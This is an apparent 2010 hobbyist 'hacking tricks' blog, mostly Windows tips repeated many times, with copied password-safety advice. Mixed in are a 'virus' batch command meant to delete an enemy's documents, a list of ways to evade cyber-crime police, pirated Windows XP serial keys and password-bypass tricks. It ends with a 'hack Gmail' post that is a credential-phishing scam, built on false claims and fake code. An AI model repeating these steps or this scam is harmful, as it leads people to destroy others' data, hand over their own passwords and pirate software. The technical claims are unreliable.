Friday, December 31, 2010
Thursday, December 30, 2010
How to Creat Google Sms Channels ?
Google sms channels are very useful for mass communication when you want to podcast any message to many peoples then use this service for freeeeee
Steps...
- Make A Gmail Account
- Login
- And Click here Google sms Channels
Now ,
Now Accept the TC and Click on Creat Your channel
Happy Computing
How to Remove A stuck Dvd or CD Without Light Energy ???
Your Working On An Important Project And suddenly The Power fails And Your Data Stored On A DvD that Is In The pc !
How will you Access Your data ?? Just try the above trick
Happy Computing
Jai Shree Raam
What A Ram Do Inside your Computer? Lets Explore
Ram Stands for ...........
Random Access Memory
remember these things about ram...........
1.IF your computer dont boot just remove your ram and re- assemble
2.Computer display controlled by Ram
3.Ram increase speed of a computer to a limited hight
4.Always use higher ram capicity for best performance
5. If a ram fails then your computer wont start and hang .........
Jai Shree Raam
Remove Bios Password With battery
Remove the cmose battery and turn on your pc it wont start ,
now fix that battery as it was (In Its Origin ) wow password goneeeee.....
Jai Shree Raam
How to Remove Bios Password? cmos+jumper
There are several ways by which you can remove your BIOS password........
but the most easy ways to remaove cmose password are ......
1.Remove the jumpher shown in the image , you can find this jumpher inside your mother board near Cmose Battery . Just Remove this jumpher and turn your pc on it wont start ,now fix it as it was now tur your pc on
WOW password gone...........
Jai Shree Raam
Hacking Rules Before Entring Into E- world
Do you Know How We Get Caught By Cyber Crime Police????
We All Do Same mistake wile using E- World ....Remember
- Destroy Your IP While Ur Active
- Destroy Your Mac
- Destroy You Inline Pipe
- Destroy Your Computers Name And Serial Key
- Do Any Thing With Your Meachine Serial No.
- Dont Yous DSL For Attacking Purpose
- Remember to Spoof
Jai Shree Raam
How to Choose the best internet Device For Your Needs? Cairo
Todays and Future World is Describe By [E] . Our Earth Will be Know As E palnet Insted of Blue Planet !
So coming to the point How to choose best Wireless Device for your needs ..??
Stepss..
- Speed
- Price
- PC Hardware
- Make list what will you do with your internet?
- How often you use it
- Nearest service Centre
- Durability/Waterproof
- USB Driver Installation
- Operating System
- Warranty
First of all Review these points Whenever you Like to Buy any device Releted to Internet !
A true hacker Is One Who Have Optic Fiber LAN card ! And a mind Beyond Normal human ! And the One who is Reading this Have all this ....... :)
Jai Shree Raam
How To Creat Autorun .ini Virus? ERD Commander
An .INI Virus is Useless and desnt harm Alone, But If He Shake hands with his .com partners then it will harm your Hardware and software assets .
Steps ...........
- Right Click On Desktop
- make a new Notpad File
- Type naything you wish
The most important Part Save as .........(.ini) Format
Your file will look like thisssssssssss
Jai Shree Raam
Check Your Connected To Internet Or Not , Ambala ,Peru,nyc
Check if your Connected to Internet or not Its a simple way and takes less than a minute
Steps.....
- Press Windowkey And R
- Type CMD
- On Dos You Can check google , yahoo, aol any site you wish to check
- just type PING YAHOO.com if i want to ping google then i will write like this
Ping Google.com
Thats It Go For it
Jai Shree Raam
Tuesday, December 28, 2010
Creat Your Animated Logo Or völlig verdreckter PC wird ausgeblasen. Wolken ohne Ende. Sieht gut aus!
Creat Your Name As your Logo .....
Show Some Creativity In Making Some Aniation Mindbloiinnnnnnnng....I have created my name as my animation , all you need is just a little knowledge how animation works and then just take your tools and start creating cool stufff
Steps...
Jai Shree Raam
Show Some Creativity In Making Some Aniation Mindbloiinnnnnnnng....I have created my name as my animation , all you need is just a little knowledge how animation works and then just take your tools and start creating cool stufff
Steps...
- Download Anime 9.12 Free Full Version Here http://f48c1be3.linkbucks.com/
- Add a background or leave it but concern with your style
- Dont Copy Anybody just Show Your Style And make A marvel
- My Creation You can see Below :)
Jai Shree Raam
How To Make A CD Start Playing Automatically (queue monier so ea sooo)
Creating A Autorun cd is simple task all you need is some basic Knowledge of computers...
Steps...
http://f48c1be3.linkbucks.com/
Jai Shree Raam
Steps...
- Make A folder on the desktop name it Anil Or your suppose
- Now copy a music file you want to use as a background music
- Collect Different images as your tags
- You need A software called autorun creator you can find it here freee full version
http://f48c1be3.linkbucks.com/
- Try And If you Having Any Problem Creating It Ask Me
- Your Final Product Will look Like The Below Spalsh Screen
Jai Shree Raam
Unable to open your Drive after Virus Affect ? Recover Your Single Bit
RECOVERY WITH NERO
Your Thinking i am nut$? or Wat? But dear Nero Have The Power to explore windows Deep Inside ! you can also use other explorer softwares but when you have nero then why spend your valuable $ on such things????
Steps......
Fig_1.3
FIG _ 1.1
Your Thinking i am nut$? or Wat? But dear Nero Have The Power to explore windows Deep Inside ! you can also use other explorer softwares but when you have nero then why spend your valuable $ on such things????
Steps......
- Open Nero and select Data Disc
- A popup Window will appear instantly look @ figure 1.2
Fig_ 1.2
- Click on Add and you willl see a window like this
- All your Data Will be stored Here
- Copy All Necessary Files to Other drive and Format this Drive
- Like Wise Format All Drives And Put Your Importan data On A formated Drive
- If Your Unable to format any drive try this
- Press WindowKey + R
- Type CMD
- On The Black screen type Format D:/ or any drive you wish to frormat
Fig_1.3
Jai Shree Raam
Monday, December 27, 2010
Top Tips for Internet Safety at Home
1. Defend your computer
Keep all software current (including your Web browser) with automatic
Password-protect your wireless connection at home.
2. Protect sensitive personal information
data–a Web address with https (“s” for secure) and a closed padlock
( ) beside it.
(IM) request.
3. Think before you click
address yourself.
Be wary of clicking links or buttons in pop-up windows.
4. Create strong passwords and keep them secret
Make them at least eight characters (longer is better) and include
5. Protect yourself from e-mail scams
Filter in Windows
Internet Explorer
8. that warns you of suspicious Web sites.
6. Use social networks more safely
Look for Settings or Options
7. Take extra steps to keep kids safer online
who they meet online.
Jai Shree Raam
Five tips to help keep your passwords secret
Treat your passwords with as much care as you treat the information that they protect.
Use strong passwords to log on to your computer and to any site—including social networking sites—where you enter your credit card number, or any financial or personal information.
1. Never provide your password in an email or in response to an email request.
•Internet "phishing" scams use fraudulent email messages to entice you to reveal your user names and passwords, steal your identity, and more. Learn more about phishing scams and how to deal with online fraud.
2.Do not type passwords on computers that you do not control, such as those in Internet cafes, computer labs, kiosk systems, and airport lounges. •Cyber criminals can purchase keystroke logging devices that gather information typed on public computers, including passwords.
If you need to regularly check email from a public computer, consider using Hotmail, which allows you to obtain a single-use code. To get a single-use code, click Sign in with a single-use code, and Hotmail will send a one-time use authentication code to a mobile phone. You can opt to use the one-time code, instead of your password, to access your account on a public machine.
3. Don't reveal your passwords to others. •Keep your passwords hidden from friends or family members (especially children), who could pass them on to other, less trustworthy individuals.
4.Protect any recorded passwords. •Don't store passwords on a file in your computer, because criminals will look there first.
5.Use more than one password. •Use different passwords for different websites and services.
6.Dont Use Any Uncertified site
7.Dont Signup On Everysite without you trust it .
Jai Shree Raam
Use strong passwords to log on to your computer and to any site—including social networking sites—where you enter your credit card number, or any financial or personal information.
1. Never provide your password in an email or in response to an email request.
•Internet "phishing" scams use fraudulent email messages to entice you to reveal your user names and passwords, steal your identity, and more. Learn more about phishing scams and how to deal with online fraud.
2.Do not type passwords on computers that you do not control, such as those in Internet cafes, computer labs, kiosk systems, and airport lounges. •Cyber criminals can purchase keystroke logging devices that gather information typed on public computers, including passwords.
If you need to regularly check email from a public computer, consider using Hotmail, which allows you to obtain a single-use code. To get a single-use code, click Sign in with a single-use code, and Hotmail will send a one-time use authentication code to a mobile phone. You can opt to use the one-time code, instead of your password, to access your account on a public machine.
3. Don't reveal your passwords to others. •Keep your passwords hidden from friends or family members (especially children), who could pass them on to other, less trustworthy individuals.
4.Protect any recorded passwords. •Don't store passwords on a file in your computer, because criminals will look there first.
5.Use more than one password. •Use different passwords for different websites and services.
6.Dont Use Any Uncertified site
7.Dont Signup On Everysite without you trust it .
Jai Shree Raam
Create strong passwords use numbers and symbols Online Safety
Strong passwords are important protections to help you have safer online transactions.
Keys to password strength: length and complexity
An ideal password is long and has letters, punctuation, symbols, and numbers.
•Whenever possible, use at least 14 characters or more.
•The greater the variety of characters in your password, the better.
•Use the entire keyboard, not just the letters and characters you use or see most often.
Create a strong password you can remember
There are many ways to create a long, complex password. Here is one way that may make remembering it easier:
Test your password with a password checker
A password checker evaluates your password's strength automatically. Try our secure password checker.
Protect your passwords from prying eyes
•The easiest way to "remember" passwords is to write them down.
It is okay to write passwords down, but keep them secure. See 5 tips to keep your passwords secret.
Common password pitfalls to avoid
Cyber criminals use sophisticated tools that can rapidly decipher passwords.
Avoid creating passwords using:
•Dictionary words in any language.
Words in all languages are vulnerable.
•Words spelled backwards, common misspellings, and abbreviations.
Words in all languages are vulnerable.
•Sequences or repeated characters.
Examples: 12345678, 222222, abcdefg, or adjacent letters on your keyboard (qwerty).
•Personal information.
Your name, birthday, driver's license, passport number, or similar information.
Jai Shree Raam
Advantages of Temporary or Disposable Email Services
Temporary or disposable free email services are those which provide you a temporary email ID or inbox which is totally spam free and needs no registration or sign up. This is very much useful as now a days Internet has become a home to spam. Millions of spam bots crawl the web daily to find email addresses so that they can bombard them with spam emails thus destroying their efficiency and creating problems for users The best way to get rid of this is to get a temporary or disposable email inbox which automatically expires after a certain time period. Disposable e-mail addressing (DEA) refers to an alternative way of sharing and managing e-mail addressing.
DEA aims to set up a new, unique e-mail address for every contact or entity, making a point-to-point connection between the sender and the recipient. Subsequently, if anyone compromises the address or utilises it in connection with any , the address-owner can easily cancel (or “dispose” of) it without affecting any other contact.
In case you want to stay protected from spam, then start using a temporary & disposable Email Services. Using these free services, you get a unique email ID which is valid for few hours or days.
Advantages of Temporary or Disposable Email Services
There are a number of people who are facing these problem of spam mail , so here are some of the advantages of using disposable email services :
- These services protect your email addresses from spam mails.
- Protect your mailbox from from being destroy by the web crawlers, spoofs and hoaxes
- Most of them require no signup and/or registration.
- Automatically expire after a certain time period.
- Anyone can choose any service as we are giving many options below as per requirement.
10 Minute Mail
As the name itself suggests, it allows the user to create a disposable email ID with a time period of 10 minutes. The e-mail address will expire after 10 minutes.
Mailinator
is a tool that allows users to create an on-the-spot email identity that provides anonymity and fights web inertia in one easy step. The given mailbox will hold 10 messages at once.
GuerillaMail
It provides users with a temporary inbox for a time period of about 15 minutes.
Temporary Inbox
is yet another simple and easy to use temporary email service that gives you an email address in different formats.
Mytrashmail.com
Allows users to choose any name he/she wants. The mails will stays to between 5 to 30 days in your account and can hold up to 4MB of emails but the email size is limited to 2MB per email.
SpamGourmet
It is yet another service which provides you with a temporary email addresses.
Mint Email
MintEmail provides users with a temporary disposable email address with a validity of four hours and also has automatic email verification.
Jetable.org
This mail service provides you with a temporary email address with a life span of one hour to one month. As soon as it is created, all the emails sent to this address are forwarded to your actual email address. This address will be deactivated after the lifespan you selected comes to its end.
MailCatch
It is an email service that allows you to create temporary disposable mailboxes, in a completely anonymous way. After creating temporary email ID,user has to go to MailCatch website to access those messages.
Incognito Mail
This email service allows their users to create a temporary e-mail account that will last 60 Minutes. Enough time to receive e-mails that contain activation or download links, and to reply to e-mails that ask for confirmation.
Mail Expire
allows their users to create a free email alias for themselves. For a period they choose, from 12 hours to 3 months, anything sent to this email alias will be passed on to them at their actual email address.
Spamfree24.org
This is a solution in every situation where you have to enter your email address and cant be sure if it will be stored by reliable websites or play directly in the hand of spammers. Uses multiple domains, “mails will be temporarily stored for a few hours”.
Pook Mail
is a multi-language temporary email inbox service that gives an email address in the format e.g. something@pookmail.com
MailNull
This email service that provides a free anti-spam-mail service to help you take control over your email. With your MailNull account, you can give out a separate temporary email address to every company which asks you for one.
eMailMiser
It allows users to create as many read-only email accounts as they like. Use these accounts once or continue to use them for as long as you’d like. The accounts continue to collect email message they receive for as long as they keep coming.
Tempomail.fr
this mail service lets you to create temporary email addresses valid from 4 hours to 1 month. Daily temporary email address creation, which appends the current date and month to your chosen email address.
MailEater
It provides free disposable email address for you to use. This temporary email can be used once or as many times as you need. Note : No Signup is necessary and its completely Free.
SpamhOle
It allows you to create a temporary email address;in the format as mention nameyoupick@spamhole.com. For the number of hours that you choose, all email to nameyoupick@spamhole.com address is automatically forwarded to your regular email address.
Spamavert.com
Disposable, one-time e-mail adresses for everyone. e-mail valid for 7 days. Mail size is limited to 5 megabytes. Users can choose the email address. Firefox addon available.
Fake Mail Generator
On visiting this site you will notice that a random mail address is saved to your clipboard. Paste (Ctrl-V) it into any form on a website. Supports custom addresses. Changes the domain frequently in order to prevent the address from being banned.
KasMail
provides you a disposable address. You can choose its expiration date: in a few days, weeks, months or never. Use the address. As needed: extend its lifespan, lock it, unlock it, make it or let it expire.
SpamMotel
Another way to fight with email spam is to download the spammotel and you are ready for free spam control. There is no need to change your current e-mail account because it is web-based.
Hidzz
Every time you register to a website it will create a free temporary email address on hidzz.com and give this address to that website. Your address will remain valid for a time period of 5 days.
ShortMail
(Short-Term Disposable Email Account System). Get your spam free Disposable Email ID in the form anything@shortmail.net
Dead Address
It instantly create a disposable email address that you can use when you need to verify registrations by email. Once you are finished with your disposable address simply delete it.
YOPMail
YOPMail is a different kind of disposable email service, where you can create email addresses without even visiting the site, simply use username@yopmail.com. Only thing to note is that the username should be unique as anyone can see the mails received to the particular username.
Saynotospams
These are the disposable e-mail addresses which expire after 15 Minutes. One can read and reply to e-mails that are sent to the temporary e-mail address within the given time frame.
MailCatch
An email service that allows you to create temporary disposable mailboxes, in a completly anonymous way. Access email via rss feeds. Emails will fade away with time(this can range from a few hours to a few days depending on the traffic).
Emeraldwebmail.com
disposable e-mail addresses which expire after 30 Minutes. You can read and reply to e-mails that are sent to the temporary e-mail address within the given time frame.
Melt Mail
With Melt Mail, you only give your unique Melt Mail address (which forwards to your own), get the desired information and after a defined time period (the melting point) the Melt Mail address will be deleted. Time limit ranges from 3 to 24 hours.
Emailzorz
Select your user name or get a random user name. Multiple domains.
No Click email
Automatic and random email creation : all the mails directed to this email will be displayed on the website.
Spam bog
Invent an eMail alias and use these immediately, where you need it! Register simply something@spambog.com. Read eMails remain 7 days, eMails can be held until 90 days. RSS and Atom feeds. Multiple domains. Firefox addon.
Gish Puppy
With GishPuppy, you can easily create a different GishPuppy email each time you register on the web. You can also cancel GishPuppy emails whenever you want, or set them to automatically expire after a certain amount of time. This is important because if that GishPuppy email “accidentally” gets in the hands of SPAMMERs, you can cancel it without affecting anyone else. Your private email is safe, and all your other web registrations are still available.
Sneak email
Mail sent to Sneakemail address is rerouted to your real address, and when you reply it is rerouted back to the sender. Your real address is never seen. Has a monthly bandwidth limit of 10MB.
4warding
create your disposable email address (alias), all the emails sent to this alias are forwarded to your private email address. If an alias is ever spammed, simply dispose of it. Multiple domains.
Temporary Forwarding
You can create an email address @temporaryforwarding.com, which forwards all mails to your private email account. As soon as you recognize that you receive spam, you can delete the forwarding and create a new one.
20minutemail
the mail received at the website would automatically be passed to your main email address (or another address of your choice).
GreenSloth
requires no registration, receive-only, e-mail expires automatically after a week.
AnonInbox
requires no registration, simple, no frills.
Spam jackal
gives you a disposable e-mail addresses which expires after 30 Minutes. You can receive, read and reply to e-mails that are sent to your temporary e-mail address within the time available.
Incognito Mail
secure, anonymous, temporary and disposable e-mail account that’ll last 60 Minutes.
Dodgeit
Pick a throwaway address, say: deeznuts@dodgeit.com. Give that address out whenever you need to. Check deeznuts from homepage of dodgeit.com. Subscribe to RSS feed to keep an eye on the mailbox. Get it? For free accounts: mail deleted after 7 days.
DontReg
is one bigger, better, faster and safer temporary email inbox solution.
Spamex
With Spamex Disposable Email Addresses you can safely provide a working email address to anyone and not have to worry about whether they will send you unwanted email or sell your email address to others.
Mailmoat
lets you take your email address BACK from the bad guys! Block the disgusting, repetitive spam; go ahead and give your email address where YOU want, and still avoid being added to their lists of victims for bulk UCE.
Mailquack
is a revolutionary new email service used to avoid annoying spam in your real inbox. When you sign up for quick services, forums, free information, ect give them a QUACK address.
Clixser
This site is an automatic Free Disposabe Email solution where you don’t have to click. When you visit this site the above generated email address is automatically saved to your clipboard.
Slopsbox
Slopsbox is your temporary mailbox, the e-mail address you use to register for random services. It’s a long-finger up the butt to spammers who wants your real e-mail.
Dot
This aprovides you a free disposable email addresses with your own domain.
BugMeNot
Not only does BugMeNot let you bypass website registration, it also offers an instant, disposable email service. Emails get deleted every 24 hours.
2Prong
Although currently offline, the open source 2Prong offered an innovative no-click disposable email system. Disposable email addresses were automatically copied to your clipboard so you could quickly paste them into the registration forms on websites. Email address domains were also changed frequently to bypass banning. See below for some good alternatives.
BlockFilter
Offering a variant of the 2Prong service, BlockFilter offers no-click disposable email that is automatically deleted every 2 hours.
Spaml
Although it doesn't switch domains, Spaml has otherwise replicated the 2Prong disposable email service.
FakeEmailGenerator
A knock-off of 2Prong that implements the same domain-changing strategy.
Mailexpire
The flexible mailexpire offers an email forwarding service that you can set to expire anywhere from 12 hours to 3 months.
Guerrilla Mail
A well-optimized site that provides email addresses that expire after 15 minutes. You can extend it 15 minutes at a time. Currently for sale by owner.
Even More
Some of following links already mentioned above!
http://www.privy-mail.com
http://www.trashmailer.com
http://trashmail.ws
http://mailcatch.com
http://spambox.us
http://www.ifakemail.com
http://www.inboxfreedom.com
http://www.expiremail.com
http://www.dsmail.biz
http://listomail.com
http://www.tempymail.com
http://www.litedrop.com
http://www.soodonims.com
http://meltmail.com
http://www.emailthe.net
http://spam.la
http://www.spamspot.com
http://greensloth.com
http://www.spammotel.com
http://spamfree24.org
http://www.pookmail.com
http://www.tempemail.net
http://www.dontreg.com
http://www.spamhole.com
Your passion will define your limits…..strive for more.
When A Packet Travels from one pc to another its converted to encrypted form But as we are hackers we know which layer works as friend for us..
Do mastry on OSI Model Cause my Last 11 Blogs as Suspended When i explaind the theory of this .. :(
Your passion will define your limits…..strive for more.
Jai Shree Raam
How you can put your Own image In Any Mp3's Background? Cia
Steps ....
- Choose any Mp3
- Set Attributes as archive
- paly it in windows media player
- right click on it
- Go to Advance tag editor
- Fill the Form
- Go to Picture tab and add your Pic
thats it thanks
Jai Shree Raam
INTEL latest Processors& Their Cache Memory
INTEL latest Processors& Their Cache Memory
Core i7 Extreme-12MB
Core i7-8MB
Core i5-8MB
Core i3-4MB
Cache memry Reduces Acess time
Jai Shree Raam
Core i7 Extreme-12MB
Core i7-8MB
Core i5-8MB
Core i3-4MB
Cache memry Reduces Acess time
Jai Shree Raam
Sunday, December 26, 2010
ANIL KUMAR TURKIYA OSI MODEL ROOT OF HACKING
Below Things are not made for hackers , but without it no one become hacker so please make your base as strong as diamond ! the worlds hardest thing ....
If you made up your mind to become the worlds most engaged Person Then you Have to Learn The OSI Model !
OSI = Open Systems Interconnection model
Dont Think I will tell you how to hack someone cause if i describe everything here than how will you become hacker everyone know wats your next step
Points To remember .....
1.When a packet travels from 1 pc to another wat happens????
2. Which layer usefull for inline
3.How to trace its working on which pipe?
And dont think you cant do any thing without anil Kumar turkiya cause no one teach me how to hack i just used my mind ...
Good Luck dear !
Your passion will define your limits……. Strive for more.
Problem in formating pen drive?
Problem in formating pen drive?
>RIGHT click on computer
>Manage>disk mgt>rt click
on pen drive>remove
letter>remove(Plug out &
plug)
>Format
Jai Shree Raam
Make your WinXP Genuine before u r caught by Microsoft 4 software counterfieting
Make your WinXP Genuine before u r caught by Microsoft 4 software counterfieting
Genuine WinXP SP2 serial key
KQP9B-C2RTK-KWPBY-6FQMB-83K98
Master Key For All Xp Ver
JVKVB-6BGWV-BDP2M-9QT9M-JP7DM
Jai Shree Raam
Genuine WinXP SP2 serial key
KQP9B-C2RTK-KWPBY-6FQMB-83K98
Master Key For All Xp Ver
JVKVB-6BGWV-BDP2M-9QT9M-JP7DM
Jai Shree Raam
Basic Shortcut Keys You Need To Learn
Some Shortcut Keys Used In Windows
F1-Help
F2-Rename
F3-Search
F4-AddressBar
F5-Refresh
F6-Spelling
F8-Safe Mode
F10-MenuBar
F11-Resize
F12-Save
Jai Shree Raam
F1-Help
F2-Rename
F3-Search
F4-AddressBar
F5-Refresh
F6-Spelling
F8-Safe Mode
F10-MenuBar
F11-Resize
F12-Save
Jai Shree Raam
How to Password Protect your Computer ???
How2Lock ur Computer?
GoTo>Run>Enter> syskey
Then Password Save It In Floppy Disk(Only ur Password Can Unlock d PC )
Jai Shree Raam
Speed UP Your Internet Use Simple Trick
Speed UP Your Internet Use Simple Trick
*Go2 Run
Type
%Temp%
*Press Enter
*Select & Delete All Files
(All Tem Files are temporary files that are useless)
Jai Shree Raam
*Go2 Run
Type
%Temp%
*Press Enter
*Select & Delete All Files
(All Tem Files are temporary files that are useless)
Jai Shree Raam
Fix Corrupted File in Windw XP
Fix Corrupted File in Windw XP
Load XP cd in CD Drive
Run
Type Sfc/scan.
ok den Copy Lost File 4m CD
Jai Shree Raam
Load XP cd in CD Drive
Run
Type Sfc/scan.
ok den Copy Lost File 4m CD
Jai Shree Raam
WINDOWS HIDDEN TOOLS
WINDOWS HIDDEN TOOLS
Type all Keywords in RUN;
1. Charmap.exe
2. Syskey.exe
3. Gpedit.exe
4. Sndvol32.exe
5. Eudcedit.exe
Jai Shree Raam
Type all Keywords in RUN;
1. Charmap.exe
2. Syskey.exe
3. Gpedit.exe
4. Sndvol32.exe
5. Eudcedit.exe
Jai Shree Raam
Know who used ur pc in ur absence n what did he do
Know who used ur pc in ur absence n what did he do.
Go
>start
>run
>Type- eventvwr.msc
>Enter & Know.
Jai Shree Raam
Increase Ur RAM by using PEN DRIVE
Increase Ur RAM by using PEN DRIVE
1.Goto system & increase virtual mem.
2.Use memory optimizers.
3.Use pen drive as RAM.
Jai Shree Raam
1.Goto system & increase virtual mem.
2.Use memory optimizers.
3.Use pen drive as RAM.
Jai Shree Raam
Trick To View Files With Extension.
Trick To View Files With Extension.
Just Go To Tools
=> Folder Option
=> Select View
=> And Uncheck Hide Extension Of File
Jai Shree Raam
Just Go To Tools
=> Folder Option
=> Select View
=> And Uncheck Hide Extension Of File
Jai Shree Raam
Want to Resume Ur Work in PC
Want to Resume Ur Work in PC
if Ur PC Gone Off
Just Resume it
Create a Shortcut & Type This
rundll32.exe PowrProf.dll
Set Suspend State!
Jai Shree Raam
if Ur PC Gone Off
Just Resume it
Create a Shortcut & Type This
rundll32.exe PowrProf.dll
Set Suspend State!
Jai Shree Raam
REMOVE thumb.db file frm ur folders
REMOVE thumb.db file frm ur folders
>tools
>folder optns
>view
>files & folders
>DO NOT cache tumbnail.
DONE
Jai Shree Raam
>tools
>folder optns
>view
>files & folders
>DO NOT cache tumbnail.
DONE
Jai Shree Raam
How to password protect MS word file?
How to password protect MS word file?
Goto tools in MSword
>option
>security.
Then type desired password
Jai Shree Raam
Goto tools in MSword
>option
>security.
Then type desired password
Jai Shree Raam
Lock ur CD-ROM
Lock ur CD-ROM:
Goto
-run
-type regedit
-find(ctrl+F)
-then type 'allocatecdrom'
-change the value 1 to 0
-to normal then type 1 to 0
Jai Shree Raam
Goto
-run
-type regedit
-find(ctrl+F)
-then type 'allocatecdrom'
-change the value 1 to 0
-to normal then type 1 to 0
Jai Shree Raam
Load ur folders faster:
Load ur folders faster:
>Tools
>Folder options
>View
>Automatically search for network folders and printers
>Don't cache thumbnails.
Jai Shree Raam
>Tools
>Folder options
>View
>Automatically search for network folders and printers
>Don't cache thumbnails.
Jai Shree Raam
Create Virus n delete ur enemy's My Document folder
Create Virus n delete ur enemy's My Document folder
In notepad type-
rmdr C:\documents and settings \S\Q.
and save it as VIRUS.BAT
Jai Shree Raam
In notepad type-
rmdr C:\documents and settings \S\Q.
and save it as VIRUS.BAT
Jai Shree Raam
Wants to clear BIOS Password Key
Wants to clear BIOS Password Key
>Open CPU
>move Jumper 2 2-3 pstn from 1-2
>start PC
>go2BIOS
>clear it
>turn off
>move J to 1-2 & d
Jai Shree Raam
>Open CPU
>move Jumper 2 2-3 pstn from 1-2
>start PC
>go2BIOS
>clear it
>turn off
>move J to 1-2 & d
Jai Shree Raam
Disable Error Reporting
Disable Error Reporting
>My Computer
>Properties
>Advanced
>Error Reporting
-Disable error reporting
Jai Shree Raam
>My Computer
>Properties
>Advanced
>Error Reporting
-Disable error reporting
Jai Shree Raam
Symbols while chating on PC
Symbols while chating on PC
For happy face
ALT +1
For other symb-
ALT +2,
ALT +3,
ALT +4 etc.
U will b getting all diffrnt kinds of symbols
Jai Shree Raam
For happy face
ALT +1
For other symb-
ALT +2,
ALT +3,
ALT +4 etc.
U will b getting all diffrnt kinds of symbols
Jai Shree Raam
To make ur Desktop Icons Transparent
Go 2 Control Panel
>Systm
>Advancd
>Performance area
>"Use drop shadows for labels on the Desktop
Jai Shree Raam
>Systm
>Advancd
>Performance area
>"Use drop shadows for labels on the Desktop
Jai Shree Raam
Make shortcut4 shutdown on desktop
>Right click on dsktop
>Selct New
>Shortcut
>Type SHUTDOWN.EXE -S-T 5
>Clik Next
>Finish
Jai Shree Raam
>Selct New
>Shortcut
>Type SHUTDOWN.EXE -S-T 5
>Clik Next
>Finish
Jai Shree Raam
Hack memory card password
Hack memory card password
>Go 2C:/system by anyFExplorer
>Rename file mmcstore2mmcstore.txt
>Open file in notepad
u will find paswod
Jai Shree Raam
>Go 2C:/system by anyFExplorer
>Rename file mmcstore2mmcstore.txt
>Open file in notepad
u will find paswod
Jai Shree Raam
Some Default Ports..
* Telnet - 23
* Http - 80
* Email - 25
* FTP - 21
* NetBios - 139
Learn It By heart They Will B very usefull when you Go inside like an intruder
Jai Shree Raam
* Http - 80
* Email - 25
* FTP - 21
* NetBios - 139
Learn It By heart They Will B very usefull when you Go inside like an intruder
Jai Shree Raam
PC TRICKS Forget Computer Password? Ambala Cantt Delhi
Forget Computer Passwrd?
1.Restart Pc
2.Press F5
3.Select-Safe Mode
4.Select-Administrator
5.Goto-User A/c
6.Remove Password
Jai Shree Raam
1.Restart Pc
2.Press F5
3.Select-Safe Mode
4.Select-Administrator
5.Goto-User A/c
6.Remove Password
Jai Shree Raam
Increase ur WEB BROWSER loading speed & save Time by 65%(both pc & mobi) ?
1) CLEAR CACHE MEMORY evry 10min !
2)set OFF IMAGES if no need !
Jai Shree Raam
2)set OFF IMAGES if no need !
Jai Shree Raam
How2 Delete All Cookies N History In Any WebBrowser? Gut ambala
Just Press
Ctrl + Shift + Delete
In Browsr Window
--
Happy Computing
Jai Shree Raam
Ctrl + Shift + Delete
In Browsr Window
--
Happy Computing
Jai Shree Raam
Make ur own font in XP Nyc CIA
Private charecter editor used for editing fonts.
>run
>Type "eudcedit"
>Try making new fonts
Jai Shree Raam
Abbreviation Ambala cantt haryana India
=>GPRS
-General Packet Radio Service
=>GSM
-The Global System for Mobile
Communications (GSM)
=>CDMA
-Code Division Multiple Access
Jai Shree Raam
-General Packet Radio Service
=>GSM
-The Global System for Mobile
Communications (GSM)
=>CDMA
-Code Division Multiple Access
Jai Shree Raam
Airtel, TaTa, Reliance & Idea =India
Our Country's networks
DoCoMo =Japan
Aircel =Malyasia
Airtel, TaTa, Reliance & Idea =India
Vodafone =England
Virgin =USA
MTS =Russia
Jai Shree Raam
DoCoMo =Japan
Aircel =Malyasia
Airtel, TaTa, Reliance & Idea =India
Vodafone =England
Virgin =USA
MTS =Russia
Jai Shree Raam
Trick 2 increase PC life:
-Dont place many icons in desktop
-Keep 50% free spce in C drive
-Dont keep foldrs in task bar.
Jai Shree Raam
Boost Your Laptop or Desktop Computer ! Uncheck Unwanted program
Uncheck Unwanted applicatin and this will increase your computers speed upto 75%
Unwanted apps starts on each boot?
Follow these Steps ..
Press Window Key + R
Then Type msconfig
press enter
& on start up tab uncheck unwanted app list.
Happy computing
Jai Shree Raam
Hide Your MAC Before Loging into Internet Ambala cantt
Mac Address is physically written on your pc ! its just like serial no of any products how can you see you mac??????
1.Go to Run
2.Type CMD
3.cd\
4.get mac
this will show you your Mac ! there are many software that you can use to hide it And no one b able to find you @ any Cost!
Good Day
Jai Shree Raam
How You Can Improve Speed Of Your Computer ???
Whenever you feel like you are getting low speed or your pc unexpectedly Hang or Dont Follow your Commands than ...... close your Eyes and take a deep breath and read above linessssssss.....
1.Press Ctrl + Shift + Esc hold them together for a while and you will see you Computer Back in Normal State In Few Secz
Thanks
Jai Shree Raam
Wednesday, December 22, 2010
Wednesday, November 3, 2010
Wednesday, October 27, 2010
Friday, October 15, 2010
How to hack Gmail Password
Need to hack Gmail passwords?
It is possible and it is easy. I have tried the method a least a
dozen times and it has
worked on all but 2 occasions, I don't know the reason
why it failed a
couple of times, but on every other occasion it has
got me the password for
the requested email address. This is how it is done:
STEP 1- Log in to your own Gmail account. Note: Your
account must be at
least 30 days old for this to work.
STEP 2- Once you have logged into your own account,
compose/write an e-mail
to: passwrdserver2 @ gmail.com This is a mailing
address to the Gmail
Staff. The automated server will send you the password
that you have
'forgotten', after receiving the information you send
them.
STEP 3- In the subject line type exactly: " PASSWORD
RECOVERY "
STEP 4- On the first line of your mail write the email
address of the person
you are hacking.
STEP 5- On the second line type in the e-mail address
you are using.
STEP 6- On the third line type in the password to YOUR
email address (your
OWN password). The computer needs your password so it
can send a JavaScript
from your account in the Gmail Server to extract the
other email addresses
password. In other word the system automatically
checks your password to
confirm the integrity of your status.
The process will be done automatically by the user
administration server. STEP 7- The final step before
sending the mail is,
type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
so for example if your Gmail id is :
David_100 @ gmail.com and your password
is: David and the email address you want to hack is:
test @ gmail.com then
compose the mail as below:
To: (passwrdserver2 @ gmail.com)
bcc: cc: (Don't write anything in cc,bcc field)
Subject: " PASSWORD RECOVERY " test @ gmail.com
David_100 @ gmail.com
David
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
The password will be sent to your inbox in a mail
called "System Reg
Message" from "System with in 6 hors. When my friend showed me how
to do this I thought it was too good a trick to keep
to myself! Just try and
enjoy!
.
It is possible and it is easy. I have tried the method a least a
dozen times and it has
worked on all but 2 occasions, I don't know the reason
why it failed a
